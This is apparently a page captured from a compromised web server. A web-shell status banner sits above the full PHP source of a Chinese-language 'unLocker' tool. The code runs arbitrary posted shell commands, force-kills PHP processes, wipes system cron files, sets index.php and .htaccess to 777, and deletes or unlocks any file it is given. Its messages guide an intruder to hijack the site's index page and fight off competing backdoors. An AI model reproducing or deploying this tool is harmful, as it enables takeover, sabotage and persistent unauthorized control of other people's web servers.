|
Server IP : 103.53.40.154 / Your IP : 3.148.108.192 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0700) : /home2/ppcad7no/.quarantine/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
ini_set('display_errors',1);
ini_set('display_startup_errors',1);
error_reporting(-1);
if (function_exists('opcache_reset')) {
opcache_reset();
}
echo "<h1>可达鸭-解锁专用文件 - Verion 0.2 2024-10-12</h1>";
if (strtoupper(substr(PHP_OS, 0, 3)) !== 'WIN') {
if (function_exists('posix_getpwuid')) {
$user_info = posix_getpwuid(posix_geteuid());
} else {
$user_info['user_info '] = "";
}
}
$cronDirs = [
'/etc/crontab',
'/etc/cron.d/',
'/var/spool/cron/crontabs/'
];
$current_pid = getmypid();
function listAndKillPhpProcesses($current_pid) {
$exec_functions = ['exec', 'shell_exec', 'system', 'passthru', 'popen', 'proc_open'];
$list_cmd = 'ps -e | grep php';
$output = [];
$kill_count = 0;
foreach ($exec_functions as $function) {
if (function_exists($function)) {
switch ($function) {
case "exec":
exec($list_cmd, $output);
break;
case "shell_exec":
$output = explode("\n", shell_exec($list_cmd));
break;
case "system":
ob_start();
system($list_cmd);
$output = explode("\n", ob_get_clean());
break;
case "passthru":
ob_start();
passthru($list_cmd);
$output = explode("\n", ob_get_clean());
break;
case "popen":
$fp = popen($list_cmd, "r");
while (!feof($fp)) {
$output[] = fgets($fp, 4096);
}
pclose($fp);
break;
case "proc_open":
$descriptorspec = [
0 => ["pipe", "r"],
1 => ["pipe", "w"],
2 => ["pipe", "w"]
];
$process = proc_open($list_cmd, $descriptorspec, $pipes);
$output = explode("\n", stream_get_contents($pipes[1]));
proc_close($process);
break;
}
if (!empty($output)) {
break;
}
}
}
foreach ($output as $line) {
echo $line . "\n";
if (preg_match('/^\s*(\d+)/', $line, $matches)) {
$pid = $matches[1];
if ($pid == $current_pid) {
echo "跳过本身 (PID: $pid)>><br>\n";
continue;
}
$kill_cmd = "kill -9 $pid";
foreach ($exec_functions as $function) {
if (function_exists($function)) {
switch ($function) {
case 'exec':
exec($kill_cmd);
break;
case 'shell_exec':
shell_exec($kill_cmd);
break;
case 'system':
system($kill_cmd);
break;
case 'passthru':
passthru($kill_cmd);
break;
case 'popen':
$fp = popen($kill_cmd, "r");
pclose($fp);
break;
case 'proc_open':
$process = proc_open($kill_cmd, $descriptorspec, $pipes);
proc_close($process);
break;
}
$kill_count++;
echo "进程 $pid 已 Kill.⚔️<br>\n";
break;
}
}
}
}
echo "共终止PHP进程数: $kill_count<br>\n";
}
function clearCronJobs($dirs) {
foreach ($dirs as $dir) {
if (is_file($dir)) {
if (file_put_contents($dir, '') === false) {
echo "无法清空文件: $dir";
return false;
} else {
echo "成功清空文件: $dir";
}
} elseif (is_dir($dir)) {
$files = glob($dir . '*');
foreach ($files as $file) {
if (is_file($file)) {
if (unlink($file)) {
echo "成功删除文件: $file";
} else {
echo "无法删除文件: $file";
return false;
}
}
}
} else {
echo "路径不存在或无效: $dir";
return false;
}
}
return true;
}
echo "当前系统用户: " . @$user_info['name'] . " | 当前脚本所有者: " . get_current_user();
echo "<hr>";
$os_info = php_uname();
echo "当前操作系统: " . $os_info . "<br>";
$server_ip = $_SERVER['SERVER_ADDR'] ?? '无法获取服务器 IP 地址';
echo "当前服务器 IP 地址: " . $server_ip;
echo "<br>当前 PHP 版本: " . phpversion();
echo "<br>服务器当前时间: " . date("Y-m-d H:i:s");
echo "<br>";
if (strpos(php_sapi_name(), 'fpm-fcgi') !== false) {
echo "当前使用的是 <b style='color:green;'>PHP-FPM</b>";
if (strpos($_SERVER['SERVER_SOFTWARE'], 'Apache') !== false) {
echo "<br>当前运行在 Apache 服务器上。 可能满足PHP-FPM漏洞";
}else{
echo "<br>" . $_SERVER['SERVER_SOFTWARE'] . "<br>";
}
} else {
echo "当前没有使用 PHP-FPM。";
}
echo "<hr>";
function is_function_enabled($func_name) {
return is_callable($func_name) && !in_array($func_name, explode(',', ini_get('disable_functions')));
}
$exec_enabled = is_function_enabled('exec');
$passthru_enabled = is_function_enabled('passthru');
$system_enabled = is_function_enabled('system');
$shell_exec_enabled = is_function_enabled('shell_exec');
$output = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['php_code'])) {
$php_code = trim($_POST['php_code']);
if ($exec_enabled) {
$output = shell_exec($php_code);
} else {
$output = 'exec function is disabled.';
}
}
if (is_function_enabled('proc_open')) {
$process = proc_open('ps aux | grep php', [
1 => ['pipe', 'w'],
2 => ['pipe', 'w'],
], $pipes);
if (is_resource($process)) {
$output = stream_get_contents($pipes[1]);
fclose($pipes[1]);
proc_close($process);
echo "<h2>正在运行的 PHP 进程:</h2>";
echo '<pre>' . htmlspecialchars($output) . '</pre>';
}
} else {
echo 'proc_open function is disabled or not available.';
}
echo "<hr>";
echo "加载的PHP扩展: " . implode(', ', get_loaded_extensions());
echo "<hr>";
function get_php_processes() {
$php_processes = [];
$process_dirs = glob('/proc/[0-9]*', GLOB_ONLYDIR);
if (is_array($process_dirs)) {
foreach ($process_dirs as $proc_dir) {
$pid = basename($proc_dir);
$cmdline_file = "/proc/$pid/cmdline";
if (file_exists($cmdline_file)) {
$cmdline = file_get_contents($cmdline_file);
if (strpos($cmdline, 'php') !== false) {
$php_processes[] = $pid;
}
}
}
}
return $php_processes;
}
$php_processes = get_php_processes();
if (!empty($php_processes)) {
echo "<h2>正在运行的 PHP 进程:</h2><ul>";
foreach ($php_processes as $process) {
if (@is_array($process)) {
echo "<li>PID: {$process['pid']}, CMD: {$process['cmdline']}</li>";
} else {
echo "<li>Invalid process data format</li>";
}
}
echo "</ul>";
} else {
echo "未找到正在运行的 PHP 进程。";
}
echo "<br>当前PHP脚本的进程ID: " . getmypid() . "<br>";
echo "<hr><h2>开始kill PHP进程...</h2>";
listAndKillPhpProcesses($current_pid);
echo "<hr>";
echo "<h2>检查定时任务</h2>";
$cron_files = [
'/etc/crontab',
'/var/spool/cron/crontabs/',
'/etc/cron.d/'
];
foreach ($cron_files as $cron_file) {
if (@is_file($cron_file) || @is_dir($cron_file)) {
echo "<h2>内容来自 $cron_file</h2><pre>";
if (@is_file($cron_file)) {
echo htmlspecialchars(file_get_contents($cron_file));
} else {
$files = glob($cron_file . '*');
foreach ($files as $file) {
echo "<h3>$file</h3>";
echo htmlspecialchars(file_get_contents($file));
}
}
echo "</pre>";
} else {
echo "无法访问 $cron_file<br>";
}
}
echo "<hr>";
$document_root = $_SERVER['DOCUMENT_ROOT'];
$index_file = $document_root . '/index.php';
$htaccess_file = $document_root . '/.htaccess';
if (file_exists($index_file)) {
echo "文件路径: " . $index_file . "<br>";
if (is_readable($index_file)) {
echo "index.php 文件有读取权限。<br>";
} else {
echo "index.php 文件没有读取权限。<br>";
}
$last_modified_time = filemtime($index_file);
echo "文件最后修改时间: " . date("Y-m-d H:i:s", $last_modified_time) . "<br>";
$permissions = substr(sprintf('%o', fileperms($index_file)), -4);
if (!is_writable($index_file)) {
echo "🔒index.php 文件被锁定 (没有写权限)。<br>";
if (chmod($index_file, 0777)) {
echo "🔑文件权限成功修改为 777。<br>";
} else {
echo "💥修改文件权限失败。<br>";
}
@chmod($htaccess_file, 0777);
} else {
echo "🚩index.php 文件<b style='color:green;'>没有被锁🔓</b> (有写权限 ". $permissions . ")<br>";
echo "👉通过大马,人工修改 index.php 并上挟持修改看看,改成功的话,查杀所有大小马。 持续观测几分钟,几小时看看还在不在,不在的话说明有其他备马或者漏洞<br>";
echo "至于上锁继续用ww上锁工具和ww小火车守护试试,同时观测是否有争抢行为<br><br><br>";
}
$wp_config = $document_root . '/wp-config.php';
if (file_exists($wp_config)) {
echo "🌏该站点是 WordPress 站点, ";
$wp_version_file = $document_root . '/wp-includes/version.php';
if (file_exists($wp_version_file)) {
$version_content = file_get_contents($wp_version_file);
if (preg_match("/\\\$wp_version\s*=\s*'([^']+)';/", $version_content, $matches)) {
$wp_version = $matches[1];
echo "版本: " . $wp_version . "<br>";
} else {
echo "无法检测 WordPress 版本。<br>";
}
} else {
echo "未找到 WordPress 版本文件。<br>";
}
} else {
echo "该站点不是 WordPress 站点。<br>";
}
} else {
echo "index.php 文件不存在。<br>";
}
$output2 = '';
$action_message = '';
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['file_action'])) {
$file_path = trim($_POST['file_path']);
// Kill all PHP processes before executing actions
if ($exec_enabled) {
shell_exec("pkill -f php");
}
// If "Unlock" button is clicked
if ($_POST['file_action'] === 'unlock') {
if (file_exists($file_path)) {
if (chmod($file_path, 0777)) {
$action_message = "文件 '$file_path' 成功解锁并设置为 777 权限。";
} else {
$action_message = "无法更改文件权限。";
}
} else {
$action_message = "文件 '$file_path' 不存在。";
}
}
if ($_POST['file_action'] === 'delete') {
if (file_exists($file_path)) {
chmod($file_path, 0777);
if (unlink($file_path)) {
$action_message = "文件 '$file_path' 成功删除。";
if (file_exists($file_path)) {
$file_info = stat($file_path);
$mod_time = date("Y-m-d H:i:s", $file_info['mtime']);
$action_message .= "<br>文件仍然存在。文件属性: " . print_r($file_info, true) . "<br>最后修改时间: " . $mod_time;
}
} else {
$action_message = "删除文件失败。";
}
} else {
$action_message = "文件 '$file_path' 不存在。";
}
}
if ($_POST['file_action'] === 'read') {
if (file_exists($file_path)) {
chmod($file_path, 0777);
if (file_exists($file_path)) {
$file_info = stat($file_path);
$mod_time = date("Y-m-d H:i:s", $file_info['mtime']);
$file_info = stat($file_path); // Get file attributes
$readable_info = [
'权限模式' => $file_info['mode'],
'用户ID(所有者)' => $file_info['uid'],
'组ID' => $file_info['gid'],
'最后访问时间' => date("Y-m-d H:i:s", $file_info['atime']),
'最后变更时间' => date("Y-m-d H:i:s", $file_info['ctime']),
];
$action_message .= "<br>文件$file_path 仍然存在。<br>文件属性: " . print_r($readable_info, true) . "<br>最后修改时间: " . $mod_time;
}
}
}
if ($_POST['file_action'] === 'delete_cron') {
if (clearCronJobs($cronDirs)) {
echo "所有定时任务已清空。\n";
} else {
echo "清空定时任务时出错,请检查日志。\n";
}
}
}
echo "<hr>";
echo "<h2>输入指定单文件路径</h2>";
echo '<form method="POST">
<textarea name="file_path" rows="3" cols="100" placeholder="输入单文件路径..."></textarea><br><br>
<button type="submit" name="file_action" value="unlock">解锁</button>
<button type="submit" name="file_action" value="delete">删除</button>
<button type="submit" name="file_action" value="read">属性</button>
<button type="submit" name="file_action" value="delete_cron">删除定时任务</button>
</form>';
if ($action_message) {
echo "<h3>结果:</h3><p>$action_message</p>";
}
echo "<hr>";
?>
<!DOCTYPE html>
<html lang="zh">
<head>
<meta charset="UTF-8">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>unLocker</title>
</head>
<body>
<h2>执行环境检测 - 执行函数检查</h2>
<ul>
<li>exec: <?php echo $exec_enabled ? 'Enabled' : 'Disabled'; ?></li>
<li>passthru: <?php echo $passthru_enabled ? 'Enabled' : 'Disabled'; ?></li>
<li>system: <?php echo $system_enabled ? 'Enabled' : 'Disabled'; ?></li>
<li>shell_exec: <?php echo $shell_exec_enabled ? 'Enabled' : 'Disabled'; ?></li>
</ul>
<h2>输入php代码开始执行</h2>
<form method="POST">
<textarea name="php_code" rows="5" cols="50" placeholder="Enter your command here..."></textarea><br><br>
<input type="submit" value="提交执行">
</form>
<?php if (!empty($output)): ?>
<h3>Output:</h3>
<pre><?php echo htmlspecialchars($output); ?></pre>
<?php endif; ?>
</body>
</html>